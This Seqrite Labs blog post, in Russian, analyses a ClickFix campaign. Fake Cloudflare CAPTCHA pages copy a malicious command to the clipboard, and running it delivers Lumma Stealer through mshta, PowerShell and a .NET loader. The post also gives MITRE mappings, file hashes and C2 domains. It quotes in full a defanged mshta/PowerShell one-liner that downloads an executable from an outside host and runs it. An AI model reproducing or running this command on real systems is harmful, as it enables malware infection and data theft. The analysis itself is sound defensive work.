• Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Seqrite Labs Блог
Связаться с отделом продаж Под обстрелом?
  • Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Главная  /  Технические  / Поддельная CAPTCHA заманивает жертв: Lumma Stealer использует буфер обмена и PowerShell
Поддельная CAPTCHA заманивает жертв: Lumma Stealer использует буфер обмена и PowerShell
25 февраль 2025

Поддельная CAPTCHA заманивает жертв: Lumma Stealer использует буфер обмена и PowerShell

Написано Соумен Бирма
Соумен Бирма
Технические

Введение:

Недавно мы выявили новую вредоносную кампанию, использующую поддельные страницы CAPTCHA для доставки Lumma Stealer — инструмента для кражи информации, работающего по модели «вредоносное ПО как услуга» (MaaS), впервые обнаруженного в 2022 году. В предыдущих кампаниях, в том числе в середине 2024 года, злоумышленники использовали ClickFix — обманную тактику, включающую фишинг и поддельные страницы reCAPTCHA для целевых страниц верификации Google.

В этой последней кампании злоумышленники продолжают использовать ClickFix, используя фишинг и поддельные страницы reCAPTCHA, чтобы обманным путём заставить жертв выполнить вредоносные команды, скопированные в буфер обмена. Однако теперь они переключили внимание на имитацию страниц верификации Cloudflare. В этом отчёте будут описаны различные этапы цепочки заражения ClickFix: страницы ClickFix, маскирующиеся под Cloudflare reCAPTCHA, и то, как злоупотребляет MSHTA и PowerShell для доставки загрузчика .NET.

Инфекционная цепь:

Цепочка заражения начинается с поддельной страницы CAPTCHA, призванной обманным путём заставить жертву выполнить вредоносную команду. На веб-странице отображается обманное сообщение типа «Я не робот — проверка Cloudflare», предлагающее пользователю скопировать и выполнить указанную команду в диалоговом окне «Выполнить» Windows. После выполнения команда запускает mshta.exe, который выполняет встроенный скрипт VBScript. Скрипт VBScript создаёт объект WScript.Shell для выполнения PowerShell Затем PowerShell использует Invoke-WebRequest для загрузки вредоносной нагрузки (g.exe) с удалённого сервера и сохранения её в папке «Загрузки». После этого v.exe запускается с помощью Start-Process, инициируя следующий этап атаки. Файл v.exe выступает в роли загрузчика, который расшифровывает и внедряет Lumma Stealer в память.

Рис. 1: Цепочка заражения

 

Рис. 2: Поддельная инструкция CAPTCHA

Анализ встроенного JS-скрипта:

Этот скрипт предназначен для проведения атаки с использованием социальной инженерии, обманным путём заставляя пользователей копировать и выполнять вредоносные команды PowerShell. Атака маскируется под процесс проверки подлинности пользователя Cloudflare, создавая видимость подлинности, но при этом скрытно выполняя вредоносные действия.

Вредоносные элементы в текстовой области:

Вредоносный JS-скрипт содержит два элемента текстовой области, в которые встроены вредоносные команды PowerShell и MSHTA. Первая полезная нагрузка выполняет команду PowerShell, предназначенную для загрузки и запуска вредоносного файла (kyc.mp4) с сайта hxxps[:]//deskbot.net. Этот метод использовался для доставки Lumma Stealer, что прокомментировано в JavaScript-файле (см. рис. 3).

Второй элемент текстовой области использует mshta.exe для выполнения сценария VBScript, который запускает команду PowerShell.

mshta vbscript:Execute(“CreateObject(“”WScript.Shell””).Run(“”powershell -c iwr 'hxxps[:]//kvndbb3[.]com/g[.]exe' -o $HOME\Downloads\v.exe; Start-Process $HOME\Downloads\v.exe””,0)(window.close) ' Я не робот – Идентификатор проверки Cloudflare: 5mUiAHM”)

Он использует Invoke-WebRequest (iwr) для загрузки «g.exe” от kvndbb3[.]com и сохраняет его как «v.exe» в папке «Загрузки». И затем запускает его с помощью Start-Process. Этот метод используется в качестве техники обхода защиты при атаках вредоносных программ, использующих такие процессы, как mshta.exe и WScript.Shell.

Рис. 3: Вредоносный JScript

 

Рис. 4: Последние изменения в JScript

 

Рис. 5: Поддельная инструкция CAPTCHA

Тактика поддельной человеческой верификации:

Одним из самых обманчивых аспектов этого скрипта является использование им механизма фальшивой человеческой верификации. Он имитирует процесс верификации Cloudflare, заставляя пользователей поверить в необходимость выполнения дополнительного шага. Когда пользователь нажимает кнопку верификации, скрипт автоматически копирует скрытую вредоносную команду в буфер обмена. Затем жертву обманным путём заставляют вставить и выполнить эту команду в терминале, что позволяет загрузить и запустить вредоносное ПО.

Для повышения эффективности атаки скрипт включает перевод на несколько языков (английский, испанский, китайский, арабский, хинди и другие). Это означает, что злоумышленник нацелен на глобальную аудиторию, что повышает вероятность успешного заражения.

Механизм перехвата буфера обмена:

Рис. 6: Перехват буфера обмена

В сценарии используется copyToClipboard() Функция, которая выбирает вредоносную команду PowerShell в скрытой текстовой области и копирует её в буфер обмена при нажатии пользователем кнопки подтверждения. Это скрытый метод, позволяющий пользователю неосознанно выполнить вредоносный код. Как показано на рисунках 3 и 5.

После копирования злоумышленник просит пользователя вставить и выполнить команду в терминале PowerShell. При выполнении вредоносная программа загружается, устанавливается и потенциально используется для закрепления на компьютере жертвы.

Анализ загрузчика dotnet:

Рис. 7. Загрузчик NET

 

Загрузчик использует различные методы противодействия анализу, чтобы помешать исследователям и избежать обнаружения. Наш анализ показал, что загрузчик отслеживает время выполнения для обнаружения отладочных сред или песочниц. Эта проверка помогает ему выявлять потенциальные попытки анализа, как показано на рисунке 8.

Рис. 8. Методика противодействия отладке

В ходе анализа загрузчика мы обнаружили, что он расшифровывает вторую полезную нагрузку, используя ключ, показанный на рисунке 9. Затем расшифрованный код внедряется в память процесса с помощью API Например, VirtualProtect, а затем WriteProcessMemory и CreateThread для выполнения внедренной полезной нагрузки. Этот метод обычно используется для обхода обнаружения и обеспечивает запуск вредоносного кода в памяти, как показано на рисунке 10 ниже.

Рис. 9. Использование ключа для декодирования данных
Рис. 10. Внедрение кода с использованием Virtual Protect

Анализ полезной нагрузки (Lumma Stealer):

Образец полезной нагрузки представляет собой 32-битный образец с зашифрованными данными и строками.

Рис. 11. Окончательная полезная нагрузка

Он выводит диалоговое окно с сообщением «Вы хотите запустить вредоносную программу», которое служит окончательной проверкой перед выполнением вредоносной программы, как показано на рисунке 12.

Рис. 12. Проверка выполнения вредоносного ПО

 

Возможности разрешения API:

Он имеет возможность разрешать API с использованием техники хеширования API, показанной на рисунке 13 ниже.

Рис.13: Возможность API Resolve

Эксфильтрация данных

вредоносных программ использует API Windows GDI, включая BitBlt и CreateCompatibleBitmap, для захвата всего экрана и сохранения захваченного содержимого в виде растрового изображения.

Рис. 14: Возможность создания скриншотов

Он также пытается украсть конфиденциальные данные из буфера обмена, используя API GetClipboardData. После извлечения данных он устанавливает соединение C2C (командно-контрольное соединение) для извлечения украденной информации.

Рис. 15: Возможность извлечения данных из буфера обмена

Соединение C2C:

Вор использует Mozilla/5.0 в строке User-Agent, чтобы маскироваться под легитимный веб-трафик при взаимодействии со своими серверами C2C. Эта тактика помогает воровать данные, избегая обнаружения антивирусными системами, которые отслеживают сетевой трафик на предмет аномалий.

Рис. 16: Пользовательский агент
Рис. 17: соединение C2C

Вредоносное ПО использует семь жестко запрограммированных доменов в качестве серверов управления и контроля для обеспечения обновлений, получения команд и извлечения украденных данных.

Вывод:

Кампания ClickFix демонстрирует, как злоумышленники продолжают использовать методы социальной инженерии для обхода мер безопасности и обмана пользователей. В этой кампании, используя поддельные страницы Cloudflare CAPTCHA, перехват буфера обмена и злоупотребление утилитами Windows, такими как MSHTA и PowerShell, злоумышленники эффективно внедряют и запускают Lumma Stealer. Загрузчик .NET, использованный в этой атаке, включает в себя методы антианализа для обхода обнаружения. Использование нескольких языков в кампании указывает на глобальный подход к нацеливанию, что делает её широко распространённой угрозой.

Методы MITRE ATT&CK:

Имя Идентификатор техники Имя
Поддельная проверка капчи T1566 Фишинг
Выполнение PowerShell T1204

T1059.001

Пользовательское исполнение
Интерпретатор команд и сценариев: PowerShell
Казнь Мшты

 

T1218.005

T1027.009

Выполнение системного двоичного прокси: Mshta
Замаскированные файлы или информация: встроенные полезные нагрузки
Захват экрана T1113 Захват экрана
Выполнил зашифрованную полезную нагрузку с помощью powershell.exe

 

T1059.001

T1027.013

Интерпретатор команд и сценариев: PowerShell
Зашифрованные файлы или информация: зашифрованный/кодированный файл
Захват ввода T1056 Keylogging
Уклонение от защиты T1055.012 Внедрение процесса: выемка процесса

 

Введение контента T1659 Внедрение вредоносного кода в системы
Управление и контроль T1071.001 Протокол прикладного уровня: веб-протоколы

 

 

Степень защиты:

Троян.Ghanarava.1739530256ee4fbc
Троян.Ghanarava.1739337049382d41
Trojan.LummaStealerCiR

МНК:

MD5 Имя файла
9A926390B4E4EF1EEC4E9E6C80382D41 v.exe
049F8BF92786B0AFF493BC8533EE4FBC Полезная нагрузка Lumma
C2C
ignoreshee.com
breedertremnd.com
garulouscuto.com
torpdidebar.com
hopeefreamed.com
actiothreaz.com
importenptoc.com
rebeldettern.com
torpdidebar.com
voicesharped.com

 

 

Авторы: 

Соумен Бирма

Вайбхав Билладе

 

 предыдущий постОкупаемость инвестиций в реализацию решения ZTNA
Следующий пост  Фишинг 2.0: новые методы, используемые киберпреступниками для обмана жертв
Соумен Бирма

О Сумен Бирма

Соумен — старший исследователь безопасности в Quick Heal Technologies. Он занимается обратной разработкой, анализом вредоносных программ и...

Статьи Соумена Бирмы »

Похожие статьи

  • От выставления счетов до AnyDesk: раскрытие фишинговой кампании, нацеленной на российские аэрокосмические организации.  

    Июль 7, 2026
  • Операция «Возвращение дракона»: кибершпионская кампания, связанная с Китаем и нацеленная на налоговую инфраструктуру правительства Индии/Министерства финансов, с использованием многоэтапного развертывания DCRAT.

    26 июня 2026
  • Злоумышленники используют архивы RAR в качестве оружия для нападения на сектор здравоохранения Таиланда.

    19 июня 2026
Избранные авторы
  • Seqrite
    Seqrite

    Seqrite является ведущим поставщиком решений в области корпоративной кибербезопасности. Специализируется на...

    Прочитайте больше статей Seqrite
  • Джоти Карлекар
    Джоти Карлекар

    Я страстный писатель, которому нравится создавать контент о новых технологиях и...

    Прочтите другие статьи Джоти Карлекара
  • Бинеш П.
    Бинеш П.

    Я страстный энтузиаст кибербезопасности и преданный писатель. Обладая талантом...

    Читайте другие статьи Бинеша П.
  • Санджай Каткар
    Санджай Каткар

    Санджай Каткар — соуправляющий директор Quick Heal Technologies...

    Читайте другие статьи Санджая Каткара
Темы
склонный (25) Cyber-атака (36) кибер-атаки (58) кибератаки (16) кибератаки (15) Информационная безопасность (340) информационная безопасность (34) Киберугроза (33) кибер-угрозы (51) Данные нарушения (56) нарушения данных (29) Потеря данных (28) предотвращение потери данных (34) data privacy (16) защита данных (34) безопасность данных (19) DLP (50) ДПДП (14) ДПДПА (17) Шифрование (16) для защиты конечных точек (112) Безопасность предприятия (19) Эксплуатировать (13) GDPR (14) вредоносных программ (76) анализ вредоносных программ (14) вредоносная атака (23) МДМ (27) Microsoft (15) MITRE ATT & CK (13) Сетевая безопасность (26) фишинг (30) Ransomware (69) атака ransomware (31) атаки ransomware (31) защита от копирования (16) Seqrite (41) Seqrite Шифрование (27) Seqrite EPS (33) Seqrite Услуги (16) обнаружение угрозы (13) Threat Intelлигенция (19) UTM (34) Уязвимость (16) нулевое доверие (13)
Seqrite Labs

Ведущий поставщик решений по корпоративной ИТ-безопасности, упрощающий защиту конечных точек, данных и сетей с помощью лучших в своем классе решений по предотвращению, обнаружению и реагированию на угрозы по всему миру.

Подробнее о Seqrite

Наши соцсети:

Подпишитесь на нашу рассылку

Будьте в курсе последних тенденций и новостей в сфере кибербезопасности.

Загрузка
Продукция и Услуги
  • облако
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • На Прем
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Платформа
  • Malware Analysis Platform
  • Микро Бизнес
  • SOHO Total Edition
  • Услуги
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Кибербезопасность и Data Privacy Awareness
Ресурсы
  • статьи
  • Статьи
  • Даташит
  • Отчеты об угрозах
  • Руководства
  • точка зрения
  • Понимание Data Privacy
  • Диалоги ДПДП
  • Политика и соответствие
  • Лицензионное соглашение
  • GoDeep.AI
  • SIA
  • Час конфиденциальности
Свяжитесь с нами
  • Зарегистрированные офисы
  • Давайте поговорим о кибербезопасности
Поддержка
  • Техподдержка
  • Загрузка программного обеспечения
  • Автономное обновление
  • Обновление прошивки
  • Обновления
  • Документация
О Нас
  • О нас Seqrite
  • Руководство
  • Награды и признание
  • Новости
Сотрудничайте
  • Партнерская программа
  • Найти партнера
  • Стать партнером
  • Seqrite Сертификаты

© 2026 Quick Heal Technologies Ltd.

Карта сайта Политика конфиденциальности Юридическая информация Политика использования файлов cookie Условия эксплуатации